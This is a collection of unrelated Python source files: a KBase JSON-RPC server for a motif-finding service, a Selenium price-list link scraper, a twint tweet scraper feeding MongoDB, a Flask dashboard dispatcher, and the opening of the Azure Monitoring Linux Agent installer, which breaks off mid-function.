its response.""" if 'types' in self.method_data[request['method']]: self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self['provenance'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def provenance(self): callbackURL = os.environ.get('SDK_CALLBACK_URL') if callbackURL: # OK, there's a callback server from which we can get provenance arg_hash = {'method': 'CallbackServer.get_provenance', 'params': [], 'version': '1.1', 'id': str(_random.random())[2:] } body = json.dumps(arg_hash) response = _requests.post(callbackURL, data=body, timeout=60) response.encoding = 'utf-8' if response.status_code == 500: if ('content-type' in response.headers and response.headers['content-type'] == 'application/json'): err = response.json() if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, response.text) else: raise ServerError('Unknown', 0, response.text) if not response.ok: response.raise_for_status() resp = response.json() if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'][0] else: return self.get('provenance') class ServerError(Exception): ''' The call returned an error. Fields: name - the name of the error. code - the error code. message - a human readable error message. data - the server side stacktrace. ''' def __init__(self, name, code, message, data=None, error=None): super(Exception, self).__init__(message) self.name = name self.code = code self.message = message if message else '' self.data = data or error or '' # data = JSON RPC 2.0, error = 1.1 def __str__(self): return self.name + ': ' + str(self.code) + '. ' + self.message + \ '\n' + self.data def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'MotifFinderSampler' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_MotifFinderSampler.find_motifs, name='MotifFinderSampler.find_motifs', types=[dict]) self.method_authentication['MotifFinderSampler.find_motifs'] = 'required' # noqa self.rpc_service.add(impl_MotifFinderSampler.BuildFastaFromSequenceSet, name='MotifFinderSampler.BuildFastaFromSequenceSet', types=[dict]) self.method_authentication['MotifFinderSampler.BuildFastaFromSequenceSet'] = 'required' # noqa self.rpc_service.add(impl_MotifFinderSampler.ExtractPromotersFromFeatureSetandDiscoverMotifs, name='MotifFinderSampler.ExtractPromotersFromFeatureSetandDiscoverMotifs', types=[dict]) self.method_authentication['MotifFinderSampler.ExtractPromotersFromFeatureSetandDiscoverMotifs'] = 'required' # noqa self.rpc_service.add(impl_MotifFinderSampler.DiscoverMotifsFromFasta, name='MotifFinderSampler.DiscoverMotifsFromFasta', types=[dict]) self.method_authentication['MotifFinderSampler.DiscoverMotifsFromFasta'] = 'required' # noqa self.rpc_service.add(impl_MotifFinderSampler.DiscoverMotifsFromSequenceSet, name='MotifFinderSampler.DiscoverMotifsFromSequenceSet', types=[dict]) self.method_authentication['MotifFinderSampler.DiscoverMotifsFromSequenceSet'] = 'required' # noqa self.rpc_service.add(impl_MotifFinderSampler.status, name='MotifFinderSampler.status', types=[dict]) authurl = config.get(AUTH) if config else None self.auth_client = _KBaseAuth(authurl) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = { 'call_stack': [{'time': self.now_in_utc(), 'method': req['method']} ] } prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params'] } ctx['provenance'] = [prov_action] try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] auth_req = self.method_authentication.get( method_name, 'none') if auth_req != 'none': if token is None and auth_req == 'required': err = JSONServerError() err.data = ( 'Authentication required for ' + 'MotifFinderSampler ' + 'but no authentication header was passed') raise err elif token is None and auth_req == 'optional': pass else: try: user = self.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception as e: if auth_req == 'required': err = JSONServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print('Request method was %s\n' % environ['REQUEST_METHOD']) # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ)) # print('Request body was: %s' % request_body) # print('Result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result)) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body.encode('utf8')] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] e = error['error'].get('error') if not e: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8 dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. # This simply lists where to "mount" the application in the URL path # # This uwsgi module "magically" appears when running the app within # uwsgi and is not available otherwise, so wrap an exception handler # around it # # To run this server in uwsgi with 4 workers listening on port 9999 use: # uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_ # To run a using the single threaded python BaseHTTP service # listening on port 9999 by default execute this file # try: import uwsgi # Before we do anything with the application, see if the # configs specify patching all std routines to be asynch # *ONLY* use this if you are going to wrap the service in # a wsgi container that has enabled gevent, such as # uwsgi with the --gevent option if config is not None and config.get('gevent_monkeypatch_all', False): print("Monkeypatching std libraries for async") from gevent import monkey monkey.patch_all() uwsgi.applications = {'': application} except ImportError: # Not available outside of wsgi, ignore pass _proc = None def start_server(host='localhost', port=0, newprocess=False): ''' By default, will start the server on localhost on a system assigned port in the main thread. Excecution of the main thread will stay in the server main loop until interrupted. To run the server in a separate process, and thus allow the stop_server method to be called, set newprocess = True. This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print("Listening on port %s" % port) if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user = application.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 ctx['module'], ctx['method'] = req['method'].split('.') prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params']} ctx['provenance'] = [prov_action] resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1])): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError as err: # print help information and exit: print(str(err)) # will print something like "option -a not recognized" sys.exit(2) port = 9999 host = 'localhost' for o, a in opts: if o == '--port': port = int(a) elif o == '--host': host = a print("Host set to %s" % host) else: assert False, "unhandled option" start_server(host=host, port=port) # print("Listening on port %s" % port) # httpd = make_server( host, port, application) # # httpd.serve_forever()
browser.py
''' Copyright (c) 2019 Vanessa Sochat Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' from selenium.common.exceptions import TimeoutException from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.keys import Keys from random import choice from threading import Thread from selenium import webdriver from http.server import SimpleHTTPRequestHandler from socketserver import TCPServer import webbrowser from time import sleep import json import shutil import re import sys import os class BrowserServer(SimpleHTTPRequestHandler): '''here we subclass SimpleHTTPServer to capture error messages ''' def log_message(self, format, *args): '''log to standard error with a date time string, and then call any subclass specific logging functions ''' sys.stderr.write("%s - - [%s] %s\n" % (self.address_string(), self.log_date_time_string(), format%args)) # Workaround for error trying to GET html if not re.search("div",format%args) and not re.search("function",format%args): if re.search("404",format%args): raise IOError(format%args) def log_error(self, format, *args): '''log_error catch errors in the log_messages instead ''' pass class BrowserRobot(object): ''' bring up a server with a custom robot Defaults ========== pause_time: time to wait between browser commands port: a random choice between 8000 and 9999 ''' def __init__(self, **kwargs): self.Handler = BrowserServer if "port" in kwargs: self.port = kwargs['port'] else: self.port = choice(range(8000,9999)) print('Selected port is %s' %self.port) self.httpd = TCPServer(("", self.port), self.Handler) self.server = Thread(target=self.httpd.serve_forever) self.server.setDaemon(True) self.server.start() self.started = True self.pause_time = 100 self.browser = None self.headless = False self.display = None self.driver = "Chrome" if "browser" in kwargs: self.driver = kwargs['browser'] def get_and_wait(self, url, sleep_seconds=0): '''a helper function to get a browser and wait a randomly selected number of seconds between 0 and 2''' self.get_browser() wait_time = choice([0, 0.25, 0.5, 0.75, 1, 1.5, 2]) self.browser.implicitly_wait(wait_time) # if error, will wait 3 seconds and retry self.browser.set_page_load_timeout(10) self.get_page(url) sleep(sleep_seconds) def get_browser(self, name=None): '''get_browser return a browser if it hasn't been initialized yet ''' if name is None: name=self.driver log_path = "%s-driver.log" % name.lower() if self.browser is None: options = self.get_options() if name.lower() == "Firefox": self.browser = webdriver.Firefox(service_log_path=log_path) else: self.browser = webdriver.Chrome(service_log_path=log_path, options=options) return self.browser def get_options(self, width=1200, height=800): '''return options for headless, no-sandbox, and custom width/height ''' options = webdriver.ChromeOptions() options.add_argument("headless") options.add_argument("no-sandbox") options.add_argument("window-size=%sx%s" %(width, height)) return options def get_page(self, url, name='Chrome'): '''get_page open a particular url, checking for Timeout ''' if self.browser is None: self.browser = self.get_browser(name) try: return self.browser.get(url) except TimeoutException: print('Browser request timeout. Are you connected to the internet?') self.browser.close() sys.exit(1) def stop(self): '''close any running browser or server, and shut down the robot ''' if self.browser is not None: self.browser.close() self.httpd.server_close() if self.display is not None: self.display.close() def run_javascript(browser,code): if self.browser is not None: return browser.execute_script(code) class ScraperRobot(BrowserRobot): def __str__(self): return "[browser-robot]" def __repr__(self): return "[browser-robot]" def get_download_urls(self, url): '''download paginated charge sheets Parameters ========== uri: the Docker Hub uri to parse. ''' self.get_and_wait(url) prefix = "https://core.secure.ehc.com/src/util/detail-price-list" javascript = 'return document.getElementsByTagName("option")' result = self.browser.execute_script(javascript) links = set() for option in result: value = option.get_attribute('value') if value != None: if "csv" in value: csvs = value.split('|') for csv in csvs: link = prefix + '/' + csv links.add(link) return list(links)
scraper.py
import subprocess import os import glob from multiprocessing import Process import logging import time from datetime import datetime import twint as tw print('Initialising twint config') #tc.Output = f'tw-{datetime.now().strftime("%Y%m%d-%H%M%S")}-newsoutlets.csv' # Set filename to include current date/time NEWSOUTLETS = ['nytimes', 'CNN', 'BBC', 'MSNBC', 'NPR', 'FoxNews', 'WSJ'] DPATH = os.getcwd() + '/data' # Equates to ./data # Checks if the directory for a user exists in /data and creates if not def check_dir_exists(name): try: os.makedirs(os.path.join(DPATH, name)) # Create directory in ./data print(f'> Created directory in /data for {name}') except FileExistsError: # Folder already exists pass # Finds the latest created file and obtains/returns datetime from filename def get_last_scraped(username): # Get all csv files in data/username directory list_of_files = glob.iglob(f'{os.path.join(DPATH, username)}/*.csv') # Get latest created file try: latest_scraped = max(list_of_files, key=os.path.getctime) filename = latest_scraped.rsplit('\\', 1)[1] # Split to get filename dstring = filename.split('.', 1)[0] # Split to get rid of .csv # Convert strftime to datetime last_date_time = datetime.strptime(dstring, '%Y%m%d-%H%M%S') return str(last_date_time) except ValueError: pass # Searches and extracts tweets for a given user def scrape_tweets(tc, username): check_dir_exists(username) current_time = datetime.now() tc.Output = os.path.join(DPATH, username, current_time.strftime("%Y%m%d-%H%M%S")) + '.csv' tc.Store_csv = True # Set Since option to only scrape since last scraped last_scraped = get_last_scraped(username) # Check if there was a last time, if not don't set a Since if last_scraped is not None: tc.Since = get_last_scraped(username) tc.Username = username print(f'> Searching tweets by the user {username}') tw.run.Search(tc) print(f'> Search under {username} complete. Adding data to database') insert_data(tc.Output) # Adds objects to database using mongoimport from a given CSV file def insert_data(filename): # Run mongoimport tool to import data to database list_files = subprocess.run(['mongoimport.exe', '-dtest', '-ctest', '--headerline', '--type=csv', filename], shell=True) if __name__ == '__main__': processes = [] t = tw.Config() # Create processes for each news outlet and assign them # to scrape_tweets function for i in range(len(NEWSOUTLETS)): t = tw.Config() p = Process(target=scrape_tweets, args=(t, NEWSOUTLETS[i])) p.start() # Start process (scrape_tweets(tc, {username})) processes.append(p) # Append process to list of processes for p in processes: p.join() # list_files = subprocess.run(['mongoimport.exe', '-dtest', '-ctest', # '--headerline', '--type=csv', 'data.csv'], # shell=True) # print("The exit code was: %d" % list_files.returncode)
dashboard.py
# Copyright (c) 2019 Microsoft Corporation # Distributed under the MIT software license from IPython import display import re import requests import threading import os from . import udash from gevent.pywsgi import WSGIServer from flask import Flask import socket import random from string import Template import logging log = logging.getLogger(__name__) app = Flask(__name__) app.logger.disabled = True def _build_path(path, base_url=None): if base_url: return "{0}/{1}".format(base_url, path) else: return path class AppRunner: def __init__(self, addr=None, base_url=None, use_relative_links=False): self.app = DispatcherApp( base_url=base_url, use_relative_links=use_relative_links ) self.base_url = base_url self.use_relative_links = use_relative_links self._thread = None if addr is None: # Allocate port self.ip = "127.0.0.1" self.port = -1 max_attempts = 10 for _ in range(max_attempts): port = random.randint(7000, 7999) if self._local_port_available(port, rais=False): self.port = port log.info("Found open port: {0}".format(port)) break else: # pragma: no cover log.info("Port already in use: {0}".format(port)) else: # pragma: no cover msg = """Could not find open port. Consider calling `interpret.set_show_addr(("127.0.0.1", 7001))` first. """ log.error(msg) raise RuntimeError(msg) else: self.ip = addr[0] self.port = addr[1] def _local_port_available(self, port, rais=True): """ Borrowed from: https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux """ try: backlog = 5 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("127.0.0.1", port)) sock.listen(backlog) sock.close() sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) sock.bind(("::1", port)) sock.listen(backlog) sock.close() except socket.error: # pragma: no cover if rais: raise RuntimeError( "The server is already running on port {0}".format(port) ) else: return False return True def stop(self): # Shutdown if self._thread is None: return True log.info("Triggering shutdown") try: path = _build_path("shutdown") url = "http://{0}:{1}/{2}".format(self.ip, self.port, path) r = requests.post(url) log.debug(r) except requests.exceptions.RequestException as e: # pragma: no cover log.info("Dashboard stop failed: {0}".format(e)) return False if self._thread is not None: self._thread.join(timeout=5.0) if self._thread.is_alive(): log.error("Thread still alive despite shutdown called.") return False self._thread = None return True def _run(self): try: class devnull: write = lambda _: None # noqa: E731 server = WSGIServer((self.ip, self.port), self.app, log=devnull) self.app.config["server"] = server server.serve_forever() except Exception as e: # pragma: no cover log.error(e, exc_info=True) def _obj_id(self, obj): return str(id(obj)) def start(self): log.info("Running app runner on: {0}:{1}".format(self.ip, self.port)) self._thread = threading.Thread(target=self._run, daemon=True) self._thread.start() def ping(self): """ Returns true if web service reachable, otherwise False.""" try: path = _build_path("") url = "http://{0}:{1}/{2}".format(self.ip, self.port, path) requests.get(url) log.info("Dashboard ping succeeded") return True except requests.exceptions.RequestException as e: # pragma: no cover log.info("Dashboard ping failed: {0}".format(e)) return False def status(self): status_dict = {} status_dict["addr"] = self.ip, self.port status_dict["base_url"] = self.base_url status_dict["use_relative_links"] = self.use_relative_links status_dict["thread_alive"] = self._thread.is_alive() if self._thread else False http_reachable = self.ping() status_dict["http_reachable"] = http_reachable return status_dict def register(self, ctx, **kwargs): # The path to this instance should be id based. self.app.register(ctx, **kwargs) def display_link(self, ctx): obj_path = self._obj_id(ctx) + "/" path = ( obj_path if self.base_url is None else "{0}/{1}".format(self.base_url, obj_path) ) start_url = ( "/" if self.use_relative_links else "http://{0}:{1}/".format(self.ip, self.port) ) url = "{0}{1}".format(start_url, path) log.info("Display URL: {0}".format(url)) return url def display(self, ctx, width="100%", height=800, open_link=False): url = self.display_link(ctx) html_str = "<!-- {0} -->\n".format(url) if open_link: html_str += r'<a href="{url}" target="_new">Open in new window</a>'.format( url=url ) html_str += """<iframe src="{url}" width={width} height={height} frameBorder="0"></iframe>""".format( url=url, width=width, height=height ) display.display_html(html_str, raw=True) return None class DispatcherApp: def __init__(self, base_url=None, use_relative_links=False): self.base_url = base_url self.use_relative_links = use_relative_links self.root_path = "/" self.shutdown_path = "/shutdown" self.favicon_path = "/favicon.ico" self.favicon_res = os.path.join( os.path.dirname(os.path.abspath(__file__)), "assets", "favicon.ico" ) self.default_app = Flask(__name__) self.pool = {} self.config = {} if self.base_url is None: self.app_pattern = re.compile(r"/?(.+?)(/|$)") else: self.app_pattern = re.compile( r"/?(?:{0}/)?(.+?)(/|$)".format(self.base_url) ) def obj_id(self, obj): return str(id(obj)) def register(self, ctx, share_tables=None): ctx_id = self.obj_id(ctx) if ctx_id not in self.pool: log.info("Creating App Entry: {0}".format(ctx_id)) ctx_path = ( "/{0}/".format(ctx_id) if self.base_url is None else "/{0}/{1}/".format(self.base_url, ctx_id) ) app = udash.generate_app( ctx, {"share_tables": share_tables}, # url_base_pathname=ctx_path, requests_pathname_prefix=ctx_path, routes_pathname_prefix=ctx_path, ) app.css.config.serve_locally = True app.scripts.config.serve_locally = True self.pool[ctx_id] = app.server else: log.debug("App Entry found: {0}".format(ctx_id)) def __call__(self, environ, start_response): path_info = environ.get("PATH_INFO", "") script_name = environ.get("SCRIPT_NAME", "") log.debug("PATH INFO : {0}".format(path_info)) log.debug("SCRIPT NAME: {0}".format(script_name)) try: if path_info == self.root_path: log.info("Root path requested.") start_response("200 OK", [("content-type", "text/html")]) content = self._root_content() return [content.encode("utf-8")] if path_info == self.shutdown_path: log.info("Shutting down.") server = self.config["server"] server.stop() start_response("200 OK", [("content-type", "text/html")]) return ["Shutdown".encode("utf-8")] if path_info == self.favicon_path: log.info("Favicon requested.") start_response("200 OK", [("content-type", "image/x-icon")]) with open(self.favicon_res, "rb") as handler: return [handler.read()] match = re.search(self.app_pattern, path_info) if match is None or self.pool.get(match.group(1), None) is None: msg = "URL not supported: {0}".format(path_info) log.error(msg) start_response("400 BAD REQUEST ERROR", [("content-type", "text/html")]) return [msg.encode("utf-8")] ctx_id = match.group(1) log.info("Routing request: {0}".format(ctx_id)) app = self.pool[ctx_id] if self.base_url and not environ["PATH_INFO"].startswith( "/{0}".format(self.base_url) ): log.info("No base url in path. Rewrite to include in path.") environ["PATH_INFO"] = "/{0}{1}".format( self.base_url, environ["PATH_INFO"] ) return app(environ, start_response) except Exception as e: # pragma: no cover log.error(e, exc_info=True) try: start_response( "500 INTERNAL SERVER ERROR", [("Content-Type", "text/plain")] ) except Exception: pass return [ "Internal Server Error caught by Dispatcher. See logs if available.".encode( "utf-8" ) ] def _root_content(self): body = r"""<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Backend Server</title> </head> <style> body { background-color: white; margin: 0; padding: 0; min-height: 100vh; } .banner { height: 65px; margin: 0; padding: 0; background-color: rgb(20, 100, 130); box-shadow: rgba(0, 0, 0, 0.1) 1px 2px 3px 0px; } .banner h2{ color: white; margin-top: 0px; padding: 15px 0; text-align: center; font-family: Georgia, Times New Roman, Times, serif; } .app { background-color: rgb(245, 245, 250); min-height: 100vh; overflow: hidden; } .card-header{ padding-top: 12px; padding-bottom: 12px; padding-left: 20px; padding-right: 20px; position: relative; line-height: 1; border-bottom: 1px solid #eaeff2; background-color: rgba(20, 100, 130, 0.78); } .card-body{ padding-top: 30px; padding-bottom: 30px; position: relative; padding-left: 20px; padding-right: 20px; } .card-title{ display: inline-block; margin: 0; color: #ffffff; } .card { border-radius: 3px; background-color: white; box-shadow: 0 2px 6px rgba(0, 0, 0, 0.08); border: 1px solid #d1d6e6; margin: 30px 20px; } .link-container { text-align: center; } .link-container ul { display: inline-block; margin: 0px; padding: 0px; } .link-container li { display: block; padding: 15px; } .center { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); transform: translate(-50%, -50%); } </style> <body> <div class="app"> <div class="banner"><h2>Backend Server</h2></div> <div class="card"> <div class="card-header"> <div class="card-title"><div class="center">Active Links</div></div> </div> <div class="card-body"> <div class="link-container"> <ul> $list </ul> </div> </div> </div> </div> </body> </html> """ if not self.pool: items = "<li>No active links.</li>" else: items = "\n".join( [ r'<li><a href="{0}">{1}</a></li>'.format( "/{0}/".format(key) if self.base_url is None else "/{0}/{1}/".format(self.base_url, key), key, ) for key in self.pool.keys() ] ) content = Template(body).substitute(list=items) return content
agent.py
#!/usr/bin/env python # # AzureMonitoringLinuxAgent Extension # # Copyright 2019 Microsoft Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import os.path import datetime import signal import pwd import grp import re import filecmp import stat import sys import traceback import time import platform import subprocess import json import base64 import inspect import urllib import urllib2 import shutil import crypt import xml.dom.minidom import re import hashlib from distutils.version import LooseVersion from hashlib import sha256 from shutil import copyfile from threading import Thread import telegraf_utils.telegraf_config_handler as telhandler import metrics_ext_utils.metrics_constants as metrics_constants import metrics_ext_utils.metrics_ext_handler as me_handler try: from Utils.WAAgentUtil import waagent import Utils.HandlerUtil as HUtil except Exception as e: # These utils have checks around the use of them; this is not an exit case print('Importing utils failed with error: {0}'.format(e)) # Global Variables PackagesDirectory = 'packages' # TO BE CHANGED WITH EACH NEW RELEASE IF THE BUNDLE VERSION CHANGES # TODO: Installer should automatically figure this out from the folder instead of requiring this update BundleFileNameDeb = 'azure-mdsd_1.5.124-build.master.89_x86_64.deb' BundleFileNameRpm = 'azure-mdsd_1.5.124-build.master.89_x86_64.rpm' BundleFileName = '' TelegrafBinName = 'telegraf' InitialRetrySleepSeconds = 30 PackageManager = '' MdsdCounterJsonPath = '/etc/mdsd.d/config-cache/metricCounters.json' # Commands OneAgentInstallCommand = '' OneAgentUninstallCommand = '' RestartOneAgentServiceCommand = '' DisableOneAgentServiceCommand = '' # Error codes DPKGLockedErrorCode = 56 MissingorInvalidParameterErrorCode = 53 UnsupportedOperatingSystem = 51 # Configuration HUtilObject = None SettingsSequenceNumber = None HandlerEnvironment = None SettingsDict = None # Change permission of log path - if we fail, that is not an exit case try: ext_log_path = '/var/log/azure/' if os.path.exists(ext_log_path): os.chmod(ext_log_path, 700) except: pass def main(): """ Main method Parse out operation from argument, invoke the operation, and finish. """ init_waagent_logger() waagent_log_info('Azure Monitoring Agent for Linux started to handle.') # Determine the operation being executed operation = None try: option = sys.argv[1] if re.match('^([-/]*)(disable)', option): operation = 'Disable' elif re.match('^([-/]*)(uninstall)', option): operation = 'Uninstall' elif re.match('^([-/]*)(install)', option): operation = 'Install' elif re.match('^([-/]*)(enable)', option): operation = 'Enable' elif re.match('^([-/]*)(update)', option): operation = 'Update' elif re.match('^([-/]*)(metrics)', option): operation = 'Metrics' except Exception as e: waagent_log_error(str(e)) if operation is None: log_and_exit('Unknown', 1, 'No valid operation provided') # Set up for exit code and any error messages exit_code = 0 message = '{0} succeeded'.format(operation) exit_code = check_disk_space_availability() if exit_code is not 0: message = '{0} failed due to low disk space'.format(operation) log_and_exit(operation, exit_code, message) # Invoke operation try: global HUtilObject HUtilObject = parse_context(operation) exit_code, output = operations[operation]() # Exit code 1 indicates a general problem that doesn't have a more # specific error code; it often indicates a missing dependency if exit_code is 1 and operation == 'Install': message = 'Install failed with exit code 1. Please check that ' \ 'dependencies are installed. For details, check logs ' \ 'in /var/log/azure/Microsoft.Azure.Monitor' \ '.AzureMonitorLinuxAgent' elif exit_code is DPKGLockedErrorCode and operation == 'Install': message = 'Install failed with exit code {0} because the ' \ 'package manager on the VM is currently locked: ' \ 'please wait and try again'.format(DPKGLockedErrorCode) elif exit_code is not 0: message = '{0} failed with exit code {1} {2}'.format(operation, exit_code, output) except AzureMonitorAgentForLinuxException as e: exit_code = e.error_code message = e.get_error_message(operation) except Exception as e: exit_code = 1 message = '{0} failed with error: {1}\n' \ 'Stacktrace: {2}'.format(operation, e, traceback.format_exc()) # Finish up and log messages log_and_exit(operation, exit_code, message) def check_disk_space_availability(): """ Check if there is the required space on the machine. """ try: if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 : # 52 is the exit code for missing dependency i.e. disk space # https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr return 52 else: return 0 except: print('Failed to check disk usage.') return 0 def get_free_space_mb(dirname): """ Get the free space in MB in the directory path. """ st = os.statvfs(dirname) return st.f_bavail * st.f_frsize / 1024 / 1024 def is_systemd(): """ Check if the system is using systemd """ check_systemd = os.system("pidof systemd 1>/dev/null 2>&1") return check_systemd == 0 def install(): """ Ensure that this VM distro and version are supported. Install the Azure Monitor Linux Agent package, using retries. Note: install operation times out from WAAgent at 15 minutes, so do not wait longer. """ find_package_manager("Install") exit_if_vm_not_supported('Install') public_settings, protected_settings = 